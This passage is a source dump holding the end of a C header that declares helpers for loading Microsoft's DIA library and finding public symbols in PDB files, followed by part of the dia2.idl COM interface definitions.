================================================================================================+*/
#ifndef __DIA_INTERFACE_H_GUARD__
#define __DIA_INTERFACE_H_GUARD__
#include <Windows.h>
#include "msdia/include/dia2.h"
#include "msdia/include/cvconst.h"
#include "callback.h"
#include "dirutil.h"
// Type definition of the "DllGetClassObject" routine from the msdiaXXX.dll module.
typedef HRESULT(STDMETHODCALLTYPE* TDllGetClassObject)(
_In_ REFCLSID rclsid,
_In_ REFIID riid,
_Out_ LPVOID* ppv
);
/// <summary>
/// Simple structure to store all the information
/// </summary>
typedef struct _PUBLIC_SYMBOL {
DWORD dwTag;
DWORD dwRVA;
DWORD dwOff;
DWORD dwSeg;
BSTR Name;
} PUBLIC_SYMBOL, *PPUBLIC_SYMBOL;
/// <summary>
/// Initialise the COM runtime and IDiaDataSource interface.
/// </summary>
HRESULT STDMETHODCALLTYPE
_Must_inspect_result_
_Success_(return == S_OK)
DiaInitialise(
_In_ PWCHAR DllName
);
/// <summary>
/// Uninitialise the COM runtime and general cleanup.
/// </summary>
VOID STDMETHODCALLTYPE DiaUninitialise();
/// <summary>
/// Load the data from the PDB file provided.
/// </summary>
HRESULT STDMETHODCALLTYPE
_Must_inspect_result_
_Success_(return == S_OK)
DiaLoadDataFromPdb(
_In_ PWCHAR FilePath
);
/// <summary>
/// Parse the PDB file to find all symbols requested.
/// </summary>
HRESULT STDMETHODCALLTYPE
_Must_inspect_result_
_Success_(return == S_OK)
DiaFindPublicSymbols(
_In_ PUBLIC_SYMBOL PublicSymbols[],
_In_ DWORD Elements
);
#endif // !__DIA_INTERFACE_H_GUARD__
================================================
FILE: DIA/inc/msdia/idl/dia2.idl
================================================
// dia2.idl - Debug Information Access (DIA) interface description
//-----------------------------------------------------------------
//
// Copyright 1999-2000 Microsoft Corporation. All Rights Reserved.
//
//---------------------------------------------------------------
import "objidl.idl";
import "oaidl.idl";
import "propidl.idl";
import "cvconst.h";
enum NameSearchOptions
{
nsNone = 0,
nsfCaseSensitive = 0x1, // apply a case sensitive match
nsfCaseInsensitive = 0x2, // apply a case insensitive match
nsfFNameExt = 0x4, // treat names as paths and apply a filename.ext match
nsfRegularExpression = 0x8, // regular expression
nsfUndecoratedName = 0x10, // applies only to symbols that have both undecorated and decorated names
// predefined names for backward source compatibility
nsCaseSensitive = nsfCaseSensitive, // apply a case sensitive match
nsCaseInsensitive = nsfCaseInsensitive, // apply a case insensitive match
nsFNameExt = nsfCaseInsensitive | nsfFNameExt, // treat names as paths and apply a filename.ext match
nsRegularExpression = nsfRegularExpression | nsfCaseSensitive, // regular expression (using only '*' and '?')
nsCaseInRegularExpression = nsfRegularExpression | nsfCaseInsensitive, // case insensitive regular expression
};
// the following are error HRESULTS returned by an IDiaDataSource they
// are based on the FACILITY_VISUALCPP (0x6d) defined in delayimp.h
enum
{
E_PDB_OK=((HRESULT) (((unsigned long)(1)<<31) | ((unsigned long)(((LONG)0x6d))<<16) | ((unsigned long)(1))) ),
E_PDB_USAGE ,
E_PDB_OUT_OF_MEMORY , // not used, use E_OUTOFMEMORY
E_PDB_FILE_SYSTEM ,
E_PDB_NOT_FOUND ,
E_PDB_INVALID_SIG ,
E_PDB_INVALID_AGE ,
E_PDB_PRECOMP_REQUIRED ,
E_PDB_OUT_OF_TI ,
E_PDB_NOT_IMPLEMENTED , // use E_NOTIMPL
E_PDB_V1_PDB ,
E_PDB_FORMAT ,
E_PDB_LIMIT ,
E_PDB_CORRUPT ,
E_PDB_TI16 ,
E_PDB_ACCESS_DENIED , // use E_ACCESSDENIED
E_PDB_ILLEGAL_TYPE_EDIT ,
E_PDB_INVALID_EXECUTABLE ,
E_PDB_DBG_NOT_FOUND ,
E_PDB_NO_DEBUG_INFO ,
E_PDB_INVALID_EXE_TIMESTAMP ,
E_PDB_RESERVED ,
E_PDB_DEBUG_INFO_NOT_IN_PDB ,
E_PDB_SYMSRV_BAD_CACHE_PATH ,
E_PDB_SYMSRV_CACHE_FULL ,
E_PDB_OBJECT_DISPOSED ,
E_PDB_MAX
};
#define PROPERTY_RW(type, name, prid, help) \
[propget, helpstring(help), id(prid)] \
HRESULT name([out, retval] type * pRetVal); \
\
[propput, helpstring(help), id(prid)] \
HRESULT name([in] type NewVal)
#define PROPERTY_ARRAY_RW(type, itype, name, prid, help) \
[propget, helpstring(help), id(prid)] \
HRESULT name([in] itype index, [out, retval] type * pRetVal); \
\
[propput, helpstring(help), id(prid)] \
HRESULT name([in] itype index, [in] type NewVal)
#define PROPERTY_RO(type, name, prid, help) \
[propget, helpstring(help), id(prid)] \
HRESULT name([out, retval] type * pRetVal)
#define PROPERTY_ARRAY_RO(type, itype, name, prid, help) \
[propget, helpstring(help), id(prid)] \
HRESULT name([in] itype index, [out, retval] type * pRetVal)
// type of callback arg to IDiaDataSource::loadDataForExe
typedef void (__cdecl *PfnPDBDebugDirV)(BOOL, /*const struct _IMAGE_DEBUG_DIRECTORY * */ void*);
interface IDiaSession;
interface IDiaEnumTables;
interface IDiaSymbol;
interface IDiaSourceFile;
interface IDiaLineNumber;
interface IDiaInputAssemblyFile;
interface IDiaInjectedSource;
interface IDiaSegment;
interface IDiaSectionContrib;
interface IDiaFrameData;
interface IDiaLVarInstance;
interface IDiaStackWalkHelper;
interface IDiaStackFrame;
interface IDiaLoadCallback;
interface IDiaLoadCallback2;
interface IDiaReadExeAtOffsetCallback;
interface IDiaReadExeAtRVACallback;
[
object,
uuid(C32ADB82-73F4-421b-95D5-A4706EDF5DBE),
local,
helpstring("IDiaLoadCallback interface."),
pointer_default(unique)
]
interface IDiaLoadCallback: IUnknown
{
HRESULT NotifyDebugDir(
[in] BOOL fExecutable,
[in] DWORD cbData,
[in, size_is(cbData)] BYTE *pbData); // really a const struct _IMAGE_DEBUG_DIRECTORY *
HRESULT NotifyOpenDBG(
[in] LPCOLESTR dbgPath,
[in] HRESULT resultCode);
HRESULT NotifyOpenPDB(
[in] LPCOLESTR pdbPath,
[in] HRESULT resultCode);
HRESULT RestrictRegistryAccess(); // return hr != S_OK to prevent querying the registry for symbol search paths
HRESULT RestrictSymbolServerAccess(); // return hr != S_OK to prevent accessing a symbol server
}
[
object,
uuid(4688a074-5a4d-4486-aea8-7b90711d9f7c),
local,
helpstring("IDiaLoadCallback interface."),
pointer_default(unique)
]
interface IDiaLoadCallback2: IDiaLoadCallback
{
HRESULT RestrictOriginalPathAccess(); // return hr != S_OK to prevent looking up PDB specified in the debug directory
HRESULT RestrictReferencePathAccess(); // return hr != S_OK to prevent looking up for PDB where the EXE is located.
HRESULT RestrictDBGAccess(); // return hr != S_OK to prevent looking up debug information from DBG files.
HRESULT RestrictSystemRootAccess(); // return hr != S_OK to prevent looking up PDBs in system root
}
[
object,
uuid(587A461C-B80B-4f54-9194-5032589A6319),
local,
helpstring("IDiaReadExeAtOffsetCallback interface."),
pointer_default(unique)
]
interface IDiaReadExeAtOffsetCallback: IUnknown
{
HRESULT ReadExecutableAt(
[in] DWORDLONG fileOffset,
[in] DWORD cbData,
[out] DWORD *pcbData,
[out, size_is(cbData)] BYTE *pbData);
}
[
object,
uuid(8E3F80CA-7517-432a-BA07-285134AAEA8E),
local,
helpstring("IDiaReadExeAtRVACallback interface."),
pointer_default(unique)
]
interface IDiaReadExeAtRVACallback: IUnknown
{
HRESULT ReadExecutableAtRVA(
[in] DWORD relativeVirtualAddress,
[in] DWORD cbData,
[out] DWORD *pcbData,
[out, size_is(cbData)] BYTE *pbData);
}
[
object,
uuid(79F1BB5F-B66E-48e5-B6A9-1545C323CA3D),
local,
helpstring("IDiaDataSource Interface"),
pointer_default(unique)
]
interface IDiaDataSource: IUnknown
{
PROPERTY_RO( BSTR, lastError, 1, "Text for last load error." );
//
// loadDataFromPdb
//
HRESULT loadDataFromPdb(
[in] LPCOLESTR pdbPath );
//
// loadAndValidateDataFromPdb
//
HRESULT loadAndValidateDataFromPdb(
[in] LPCOLESTR pdbPath,
[in] GUID* pcsig70,
[in] DWORD sig,
[in] DWORD age );
//
// loadDataForExe
//
HRESULT loadDataForExe(
[in] LPCOLESTR executable,
[in] LPCOLESTR searchPath,
[in] IUnknown* pCallback );
//
// loadDataFromIStream
//
HRESULT loadDataFromIStream(
[in] IStream *pIStream );
HRESULT openSession(
[out] IDiaSession** ppSession
);
//
// loadDataFromCodeViewInfo
//
HRESULT loadDataFromCodeViewInfo(
[in] LPCOLESTR executable,
[in] LPCOLESTR searchPath,
[in] DWORD cbCvInfo,
[in, size_is(cbCvInfo)]
BYTE* pbCvInfo,
[in] IUnknown* pCallback );
//
// loadDataFromMiscInfo
//
HRESULT loadDataFromMiscInfo(
[in] LPCOLESTR executable,
[in] LPCOLESTR searchPath,
[in] DWORD timeStampExe,
[in] DWORD timeStampDbg,
[in] DWORD sizeOfExe,
[in] DWORD cbMiscInfo,
[in, size_is(cbMiscInfo)]
BYTE* pbMiscInfo,
[in] IUnknown* pCallback );
}
[
object,
uuid(CAB72C48-443B-48f5-9B0B-42F0820AB29A),
local,
helpstring("IDiaEnumSymbols Interface"),
pointer_default(unique)
]
interface IDiaEnumSymbols: IUnknown
{
PROPERTY_RO( IUnknown*, _NewEnum, DISPID_NEWENUM, "IEnumVARIANT version of IDiaEnumSymbols." );
PROPERTY_RO( LONG, Count, 1, "Number of symbols." );
[id(0), helpstring("Return the symbol for the given index.")]
HRESULT Item([in] DWORD index, [out, retval]IDiaSymbol **symbol);
HRESULT Next(
[in] ULONG celt,
[out] IDiaSymbol ** rgelt,
[out] ULONG * pceltFetched
);
HRESULT Skip(
[in] ULONG celt);
HRESULT Reset();
HRESULT Clone(
[out] IDiaEnumSymbols **ppenum);
}
[
object,
uuid(624B7D9C-24EA-4421-9D06-3B577471C1FA),
local,
helpstring("IDiaEnumSymbolsByAddr Interface"),
pointer_default(unique)
]
interface IDiaEnumSymbolsByAddr: IUnknown
{
//
// Item(ByXxx) re-positions the enumerator to the item found
//
[helpstring("Return the symbol for the given address.")]
HRESULT symbolByAddr(
[in] DWORD isect,
[in] DWORD offset,
[out, retval]IDiaSymbol** ppSymbol);
[helpstring("Return the symbol for the given relative virtual address.")]
HRESULT symbolByRVA(
[in] DWORD relativeVirtualAddress,
[out, retval]IDiaSymbol** ppSymbol);
[helpstring("Return the symbol for the given virtual address.")]
HRESULT symbolByVA(
[in] ULONGLONG virtualAddress,
[out, retval]IDiaSymbol** ppSymbol);
HRESULT Next(
[in] ULONG celt,
[out] IDiaSymbol ** rgelt,
[out] ULONG * pceltFetched
);
HRESULT Prev(
[in] ULONG celt,
[out] IDiaSymbol ** rgelt,
[out] ULONG * pceltFetched
);
HRESULT Clone(
[out] IDiaEnumSymbolsByAddr **ppenum);
}
[
object,
uuid(1E45BD02-BE45-4D71-BA32-0E576CFCD59F),
local,
helpstring("IDiaEnumSymbolsByAddr2 Interface"),
pointer_default(unique)
]
interface IDiaEnumSymbolsByAddr2: IDiaEnumSymbolsByAddr
{
HRESULT symbolByAddrEx(
[in] BOOL fPromoteBlockSym,
[in] DWORD isect,
[in] DWORD offset,
[out, retval]IDiaSymbol** ppSymbol);
HRESULT symbolByRVAEx(
[in] BOOL fPromoteBlockSym,
[in] DWORD relativeVirtualAddress,
[out, retval]IDiaSymbol** ppSymbol);
HRESULT symbolByVAEx(
[in] BOOL fPromoteBlockSym,
[in] ULONGLONG virtualAddress,
[out, retval]IDiaSymbol** ppSymbol);
HRESULT NextEx(
[in] BOOL fPromoteBlockSym,
[in] ULONG celt,
[out] IDiaSymbol ** rgelt,
[out] ULONG * pceltFetched
);
HRESULT PrevEx(
[in] BOOL fPromoteBlockSym,
[in] ULONG celt,
[out] IDiaSymbol ** rgelt,
[out] ULONG * pceltFetched
);
}
[
object,
uuid(10F3DBD9-664F-4469-B808-9471C7A50538),
local,
helpstring("IDiaEnumSourceFiles Interface"),
pointer_default(unique)
]
interface IDiaEnumSourceFiles: IUnknown
{
PROPERTY_RO( IUnknown*, _NewEnum, DISPID_NEWENUM, "IEnumVARIANT version of IDiaEnumSourceFiles." );
PROPERTY_RO( LONG, Count, 1, "Number of source files." );
[id(0), helpstring("Return the source file for the given index.")]
HRESULT Item([in] DWORD index, [out, retval]IDiaSourceFile **sourceFile);
HRESULT Next(
[in] ULONG celt,
[out] IDiaSourceFile ** rgelt,
[out] ULONG * pceltFetched
);
HRESULT Skip(
[in] ULONG celt);
HRESULT Reset();
HRESULT Clone(
[out] IDiaEnumSourceFiles **ppenum);
}
[
object,
uuid(1C7FF653-51F7-457E-8419-B20F57EF7E4D),
local,
helpstring("IDiaEnumInputAssemblyFiles Interface"),
pointer_default(unique)
]
interface IDiaEnumInputAssemblyFiles: IUnknown
{
PROPERTY_RO( IUnknown*, _NewEnum, DISPID_NEWENUM, "IEnumVARIANT version of IDiaEnumInputAssemblyFiles." );
PROPERTY_RO( LONG, Count, 1, "Number of input assembly files." );
[id(0), helpstring("Return the source file for the given index.")]
HRESULT Item([in] DWORD index, [out, retval]IDiaInputAssemblyFile **file);
HRESULT Next(
[in] ULONG celt,
[out] IDiaInputAssemblyFile ** rgelt,
[out] ULONG * pceltFetched
);
HRESULT Skip(
[in] ULONG celt);
HRESULT Reset();
HRESULT Clone(
[out] IDiaEnumInputAssemblyFiles **ppenum);
}
[
object,
uuid(FE30E878-54AC-44f1-81BA-39DE940F6052),
local,
helpstring("IDiaEnumLineNumbers Interface"),
pointer_default(unique)
]
interface IDiaEnumLineNumbers: IUnknown
{
PROPERTY_RO( IUnknown*, _NewEnum, DISPID_NEWENUM, "IEnumVARIANT version of IDiaEnumLineNumbers." );
PROPERTY_RO( LONG, Count, 1, "Number of line numbers." );
[id(0), helpstring("Return the line number for the given index.")]
HRESULT Item([in] DWORD index, [out, retval]IDiaLineNumber **lineNumber);
HRESULT Next(
[in] ULONG celt,
[out] IDiaLineNumber ** rgelt,
[out] ULONG * pceltFetched
);
HRESULT Skip(
[in] ULONG celt);
HRESULT Reset();
HRESULT Clone(
[out] IDiaEnumLineNumbers **ppenum);
}
[
object,
uuid(D5612573-6925-4468-8883-98CDEC8C384A),
local,
helpstring("IDiaEnumInjectedSources Interface"),
pointer_default(unique)
]
interface IDiaEnumInjectedSources: IUnknown
{
PROPERTY_RO( IUnknown*, _NewEnum, DISPID_NEWENUM, "IEnumVARIANT version of IDiaEnumInjectedSources." );
PROPERTY_RO( LONG, Count, 1, "Number of injected source files." );
[id(0), helpstring("Return the injected source for the given index.")]
HRESULT Item([in] DWORD index, [out, retval]IDiaInjectedSource **injectedSource);
HRESULT Next(
[in] ULONG celt,
[out] IDiaInjectedSource ** rgelt,
[out] ULONG * pceltFetched
);
HRESULT Skip(
[in] ULONG celt);
HRESULT Reset();
HRESULT Clone(
[out] IDiaEnumInjectedSources **ppenum);
}
[
object,
uuid(E8368CA9-01D1-419d-AC0C-E31235DBDA9F),
local,
helpstring("IDiaEnumSegments Interface"),
pointer_default(unique)
]
interface IDiaEnumSegments: IUnknown
{
PROPERTY_RO( IUnknown*, _NewEnum, DISPID_NEWENUM, "IEnumVARIANT version of IDiaEnumSegments." );
PROPERTY_RO( LONG, Count, 1, "Number of segments." );
[id(0), helpstring("Return the segment for the given index.")]
HRESULT Item([in] DWORD index, [out, retval]IDiaSegment **segment);
HRESULT Next(
[in] ULONG celt,
[out] IDiaSegment ** rgelt,
[out] ULONG * pceltFetched
);
HRESULT Skip(
[in] ULONG celt);
HRESULT Reset();
HRESULT Clone(
[out] IDiaEnumSegments **ppenum);
}
[
object,
uuid(1994DEB2-2C82-4b1d-A57F-AFF424D54A68),
local,
helpstring("IDiaEnumSectionContribs Interface"),
pointer_default(unique)
]
interface IDiaEnumSectionContribs: IUnknown
{
PROPERTY_RO( IUnknown*, _NewEnum, DISPID_NEWENUM, "IEnumVARIANT version of IDiaEnumSectionContribs." );
PROPERTY_RO( LONG, Count, 1, "Number of section contributions." );
[id(0), helpstring("Return the section contribution for the given index.")]
HRESULT Item([in] DWORD index, [out, retval]IDiaSectionContrib **section);
HRESULT Next(
[in] ULONG celt,
[out] IDiaSectionContrib ** rgelt,
[out] ULONG * pceltFetched
);
HRESULT Skip(
[in] ULONG celt);
HRESULT Reset();
HRESULT Clone(
[out] IDiaEnumSectionContribs **ppenum);
}
[
object,
uuid(9FC77A4B-3C1C-44ed-A798-6C1DEEA53E1F),
local,
helpstring("IDiaEnumFrameData Interface"),
pointer_default(unique)
]
interface IDiaEnumFrameData: IUnknown
{
PROPERTY_RO( IUnknown*, _NewEnum, DISPID_NEWENUM, "IEnumVARIANT version of IDiaEnumFrameData." );
PROPERTY_RO( LONG, Count, 1, "Number of frames." );
[id(0), helpstring("Return the frame for the given index.")]
HRESULT Item([in] DWORD index, [out, retval]IDiaFrameData **frame);
HRESULT Next(
[in] ULONG celt,
[out] IDiaFrameData ** rgelt,
[out] ULONG * pceltFetched
);
HRESULT Skip(
[in] ULONG celt);
HRESULT Reset();
HRESULT Clone(
[out] IDiaEnumFrameData **ppenum);
//
// The following two by-address lookups do not reposition the enumeration
//
[helpstring("Return the frame for the given relative virtual address.")]
HRESULT frameByRVA(
[in] DWORD relativeVirtualAddress,
[out, retval]IDiaFrameData **frame);
[helpstring("Return the frame for the given virtual address.")]
HRESULT frameByVA(
[in] ULONGLONG virtualAddress,
[out, retval]IDiaFrameData **frame);
}
[
object,
uuid(486943E8-D187-4a6b-A3C4-291259FFF60D),
local,
helpstring("IDiaEnumDebugStreamData Interface"),
pointer_default(unique)
]
interface IDiaEnumDebugStreamData: IUnknown
{
PROPERTY_RO( IUnknown*, _NewEnum, DISPID_NEWENUM, "IEnumVARIANT version of IDiaEnumDebugStreamData." );
PROPERTY_RO( LONG, Count, 1, "Number of elements in the stream." );
PROPERTY_RO( BSTR, name, 2, "Stream name." );
[id(0), helpstring("Return the element for the given index.")]
HRESULT Item(
[in] DWORD index,
[in] DWORD cbData,
[out] DWORD *pcbData,
[out, size_is(cbData)] BYTE *pbData
);
HRESULT Next(
[in] ULONG celt,
[in] DWORD cbData,
[out] DWORD *pcbData,
[out, size_is(cbData)] BYTE *pbData,
[out] ULONG * pceltFetched
);
HRESULT Skip(
[in] ULONG celt);
HRESULT Reset();
HRESULT Clone(
[out] IDiaEnumDebugStreamData **ppenum);
}
[
object,
uuid(08CBB41E-47A6-4f87-92F1-1C9C87CED044),
local,
helpstring("IDiaEnumDebugStreams Interface"),
pointer_default(unique)
]
interface IDiaEnumDebugStreams: IUnknown
{
PROPERTY_RO( IUnknown*, _NewEnum, DISPID_NEWENUM, "IEnumVARIANT version of IDiaEnumDebugStreams." );
PROPERTY_RO( LONG, Count, 1, "Number of streams." );
[id(0), helpstring("Return the stream for the given index.")]
HRESULT Item([in] VARIANT index, [out, retval]IDiaEnumDebugStreamData **stream);
HRESULT Next(
[in] ULONG celt,
[out] IDiaEnumDebugStreamData ** rgelt,
[out] ULONG * pceltFetched
);
HRESULT Skip(
[in] ULONG celt);
HRESULT Reset();
HRESULT Clone(
[out] IDiaEnumDebugStreams **ppenum);
}
struct DiaAddressMapEntry
{
DWORD rva;
DWORD rvaTo;
};
[
object,
uuid(B62A2E7A-067A-4ea3-B598-04C09717502C),
local,
helpstring("IDiaAddressMap Interface"),
pointer_default(unique)
]
interface IDiaAddressMap: IUnknown
{
PROPERTY_RW( BOOL, addressMapEnabled, 3, "Enable address translations." );
PROPERTY_RW( BOOL, relativeVirtualAddressEnabled, 4, "Enable relative virtual address computations.");
PROPERTY_RW( DWORD, imageAlign, 5, "Original image alignment." );
HRESULT set_imageHeaders(
[in] DWORD cbData,
[in, size_is(cbData)] BYTE *pbData, // actual type is IMAGE_SECTION_HEADER[]
[in] BOOL originalHeaders ); // true: headers are original, that is, they match the debug symbols
// false: headers are current, that is, they match the image
HRESULT set_addressMap(
[in] DWORD cData, // number of entries in rva map
[in, size_is(cData)] struct DiaAddressMapEntry *pData, // rva map
[in] BOOL imageToSymbols ); // true: map from image to symbols (omapt)
// false: map from symbols to image (omapf)
};
[
object,
uuid(2F609EE1-D1C8-4E24-8288-3326BADCD211),
local,
helpstring("IDiaSession Interface"),
pointer_default(unique)
]
interface IDiaSession: IUnknown
{
PROPERTY_RW( ULONGLONG, loadAddress, 1, "Dll/Exe load address." );
PROPERTY_RO( IDiaSymbol*, globalScope, 2, "Global scope (exe) symbol." );
HRESULT getEnumTables(
[out] IDiaEnumTables** ppEnumTables );
HRESULT getSymbolsByAddr(
[out] IDiaEnumSymbolsByAddr** ppEnumbyAddr );
//
// Queries that return sets of symbols
//
HRESULT findChildren(
[in] IDiaSymbol* parent,
[in] enum SymTagEnum symtag,
[in] LPCOLESTR name,
[in] DWORD compareFlags,
[out] IDiaEnumSymbols** ppResult );
HRESULT findChildrenEx(
[in] IDiaSymbol* parent,
[in] enum SymTagEnum symtag,
[in] LPCOLESTR name,
[in] DWORD compareFlags,
[out] IDiaEnumSymbols** ppResult );
HRESULT findChildrenExByAddr(
[in] IDiaSymbol* parent,
[in] enum SymTagEnum symtag,
[in] LPCOLESTR name,
[in] DWORD compareFlags,
[in] DWORD isect,
[in] DWORD offset,
[out] IDiaEnumSymbols** ppResult );
HRESULT findChildrenExByVA(
[in] IDiaSymbol* parent,
[in] enum SymTagEnum symtag,
[in] LPCOLESTR name,
[in] DWORD compareFlags,
[in] ULONGLONG va,
[out] IDiaEnumSymbols** ppResult );
HRESULT findChildrenExByRVA(
[in] IDiaSymbol* parent,
[in] enum SymTagEnum symtag,
[in] LPCOLESTR name,
[in] DWORD compareFlags,
[in] DWORD rva,
[out] IDiaEnumSymbols** ppResult );
HRESULT findSymbolByAddr(
[in] DWORD isect,
[in] DWORD offset,
[in] enum SymTagEnum symtag,
[out] IDiaSymbol** ppSymbol );
HRESULT findSymbolByRVA(
[in] DWORD rva,
[in] enum SymTagEnum symtag,
[out] IDiaSymbol** ppSymbol );
HRESULT findSymbolByVA(
[in] ULONGLONG va,
[in] enum SymTagEnum symtag,
[out] IDiaSymbol** ppSymbol );
HRESULT findSymbolByToken(
[in] ULONG token,
[in] enum SymTagEnum symtag,
[out] IDiaSymbol** ppSymbol );
HRESULT symsAreEquiv(
[in] IDiaSymbol* symbolA,
[in] IDiaSymbol* symbolB );
HRESULT symbolById(
[in] DWORD id,
[out] IDiaSymbol** ppSymbol );
HRESULT findSymbolByRVAEx(
[in] DWORD rva,
[in] enum SymTagEnum symtag,
[out] IDiaSymbol** ppSymbol,
[out] long* displacement );
HRESULT findSymbolByVAEx(
[in] ULONGLONG va,
[in] enum SymTagEnum symtag,
[out] IDiaSymbol** ppSymbol,
[out] long* displacement );
//
// Queries that return source file results
//
HRESULT findFile(
[in] IDiaSymbol* pCompiland,
[in] LPCOLESTR name,
[in] DWORD compareFlags,
[out] IDiaEnumSourceFiles** ppResult );
HRESULT findFileById(
[in] DWORD uniqueId,
[out] IDiaSourceFile** ppResult );
//
// Queries that return line number results
//
HRESULT findLines(
[in] IDiaSymbol* compiland,
[in] IDiaSourceFile* file,
[out] IDiaEnumLineNumbers** ppResult );
HRESULT findLinesByAddr(
[in] DWORD seg,
[in] DWORD offset,
[in] DWORD length,
[out] IDiaEnumLineNumbers** ppResult );
HRESULT findLinesByRVA(
[in] DWORD rva,
[in] DWORD length,
[out] IDiaEnumLineNumbers** ppResult );
HRESULT findLinesByVA(
[in] ULONGLONG va,
[in] DWORD length,
[out] IDiaEnumLineNumbers** ppResult );
HRESULT findLinesByLinenum(
[in] IDiaSymbol* compiland,
[in] IDiaSourceFile* file,
[in] DWORD linenum,
[in] DWORD column,
[out] IDiaEnumLineNumbers** ppResult );
//
// Queries that return injected source
//
HRESULT findInjectedSource(
[in] LPCOLESTR srcFile,
[out] IDiaEnumInjectedSources** ppResult );
HRESULT getEnumDebugStreams(
[out] IDiaEnumDebugStreams** ppEnumDebugStreams);
//
// Queries that return inline frames
//
HRESULT findInlineFramesByAddr(
[in] IDiaSymbol* parent,
[in] DWORD isect,
[in] DWORD offset,
[out] IDiaEnumSymbols** ppResult);
HRESULT findInlineFramesByRVA(
[in] IDiaSymbol* parent,
[in] DWORD rva,
[out] IDiaEnumSymbols** ppResult);
HRESULT findInlineFramesByVA(
[in] IDiaSymbol* parent,
[in] ULONGLONG va,
[out] IDiaEnumSymbols** ppResult);
//
// Queries that return inlinee lines
//
HRESULT findInlineeLines(
[in] IDiaSymbol* parent,
[out] IDiaEnumLineNumbers** ppResult);
HRESULT findInlineeLinesByAddr(
[in] IDiaSymbol* parent,
[in] DWORD isect,
[in] DWORD offset,
[in] DWORD length,
[out] IDiaEnumLineNumbers** ppResult);
HRESULT findInlineeLinesByRVA(
[in] IDiaSymbol* parent,
[in] DWORD rva,
[in] DWORD length,
[out] IDiaEnumLineNumbers** ppResult);
HRESULT findInlineeLinesByVA(
[in] IDiaSymbol* parent,
[in] ULONGLONG va,
[in] DWORD length,
[out] IDiaEnumLineNumbers** ppResult);
HRESULT findInlineeLinesByLinenum(
[in] IDiaSymbol* compiland,
[in] IDiaSourceFile* file,
[in] DWORD linenum,
[in] DWORD column,
[out] IDiaEnumLineNumbers** ppResult);
//
// Query inline instance
//
HRESULT findInlineesByName(
[in] LPCOLESTR name,
[in] DWORD option,
[out] IDiaEnumSymbols** ppResult);
// Find Accelerator InlineeLines by line number
HRESULT findAcceleratorInlineeLinesByLinenum(
[in] IDiaSymbol* parent,
[in] IDiaSourceFile* file,
[in] DWORD linenum,
[in] DWORD column,
[out] IDiaEnumLineNumbers** ppResult);
// Find symbols corresponding to a Accelerator address taken
// variable from its tag value
HRESULT findSymbolsForAcceleratorPointerTag(
[in] IDiaSymbol *parent,
[in] DWORD tagValue,
[out] IDiaEnumSymbols** ppResult);
HRESULT findSymbolsByRVAForAcceleratorPointerTag(
[in] IDiaSymbol *parent,
[in] DWORD tagValue,
[in] DWORD rva,
[out] IDiaEnumSymbols** ppResult);
HRESULT findAcceleratorInlineesByName(
[in] LPCOLESTR name,
[in] DWORD option,
[out] IDiaEnumSymbols** ppResult);
HRESULT addressForVA(
[in] ULONGLONG va,
[out] DWORD* pISect,
[out] DWORD* pOffset);
HRESULT addressForRVA(
[in] DWORD rva,
[out] DWORD* pISect,
[out] DWORD* pOffset);
/////////////////////////////////////
HRESULT findILOffsetsByAddr(
[in] DWORD isect,
[in] DWORD offset,
[in] DWORD length,
[out] IDiaEnumLineNumbers** ppResult);
HRESULT findILOffsetsByRVA(
[in] DWORD rva,
[in] DWORD length,
[out] IDiaEnumLineNumbers** ppResult);
HRESULT findILOffsetsByVA(
[in] ULONGLONG va,
[in] DWORD length,
[out] IDiaEnumLineNumbers** ppResult);
HRESULT findInputAssemblyFiles(
[out] IDiaEnumInputAssemblyFiles** ppResult);
HRESULT findInputAssembly(
[in] DWORD index,
[out] IDiaInputAssemblyFile** ppResult);
HRESULT findInputAssemblyById(
[in] DWORD uniqueId,
[out] IDiaInputAssemblyFile** ppResult);
HRESULT getFuncMDTokenMapSize(
[out] DWORD *pcb);
HRESULT getFuncMDTokenMap(
[in] DWORD cb,
[out] DWORD *pcb,
[out, size_is(cb)] BYTE *pb);
HRESULT getTypeMDTokenMapSize(
[out] DWORD *pcb);
HRESULT getTypeMDTokenMap(
[in] DWORD cb,
[out] DWORD *pcb,
[out, size_is(cb)] BYTE *pb);
/////////////////////////////////////
HRESULT getNumberOfFunctionFragments_VA(
[in] ULONGLONG vaFunc,
[in] DWORD cbFunc,
[out] DWORD *pNumFragments);
HRESULT getNumberOfFunctionFragments_RVA(
[in] DWORD rvaFunc,
[in] DWORD cbFunc,
[out] DWORD *pNumFragments);
HRESULT getFunctionFragments_VA(
[in] ULONGLONG vaFunc,
[in] DWORD cbFunc,
[in] DWORD cFragments,
[out, size_is(cFragments)] ULONGLONG *pVaFragment,
[out, size_is(cFragments)] DWORD *pLenFragment);
HRESULT getFunctionFragments_RVA(
[in] DWORD rvaFunc,
[in] DWORD cbFunc,
[in] DWORD cFragments,
[out, size_is(cFragments)] DWORD *pRvaFragment,
[out, size_is(cFragments)] DWORD *pLenFragment);
HRESULT getExports(
[out] IDiaEnumSymbols** ppResult);
HRESULT getHeapAllocationSites(
[out] IDiaEnumSymbols** ppResult );
HRESULT findInputAssemblyFile(
[in] IDiaSymbol* pSymbol,
[out] IDiaInputAssemblyFile** ppResult);
};
/*
* Table Columns
*
* Symbols - a symbol will have values in some subset of the fields
*/
[
object,
uuid(cb787b2f-bd6c-4635-ba52-933126bd2dcd),
local,
helpstring("IDiaSymbol Interface"),
pointer_default(unique)
]
interface IDiaSymbol: IUnknown
{
PROPERTY_RO( DWORD, symIndexId, 0, "Unique symbol identifier." );
PROPERTY_RO( DWORD, symTag, 1, "Symbol kind tag." );
PROPERTY_RO( BSTR, name, 2, "Name" );
PROPERTY_RO( IDiaSymbol*, lexicalParent, 3, "Lexical parent symbol.");
PROPERTY_RO( IDiaSymbol*, classParent, 4, ".");
PROPERTY_RO( IDiaSymbol*, type, 5, ".");
PROPERTY_RO( DWORD, dataKind, 6, ".");
PROPERTY_RO( DWORD, locationType, 7, ".");
PROPERTY_RO( DWORD, addressSection, 8, ".");
PROPERTY_RO( DWORD, addressOffset, 9, ".");
PROPERTY_RO( DWORD, relativeVirtualAddress, 10, ".");
PROPERTY_RO( ULONGLONG, virtualAddress, 11, ".");
PROPERTY_RO( DWORD, registerId, 12, ".");
PROPERTY_RO( LONG, offset, 13, ".");
PROPERTY_RO( ULONGLONG, length, 14, ".");
PROPERTY_RO( DWORD, slot, 15, ".");
PROPERTY_RO( BOOL, volatileType, 16, ".");
PROPERTY_RO( BOOL, constType, 17, ".");
PROPERTY_RO( BOOL, unalignedType, 18, ".");
PROPERTY_RO( DWORD, access, 19, ".");
PROPERTY_RO( BSTR, libraryName, 20, ".");
PROPERTY_RO( DWORD, platform, 21, ".");
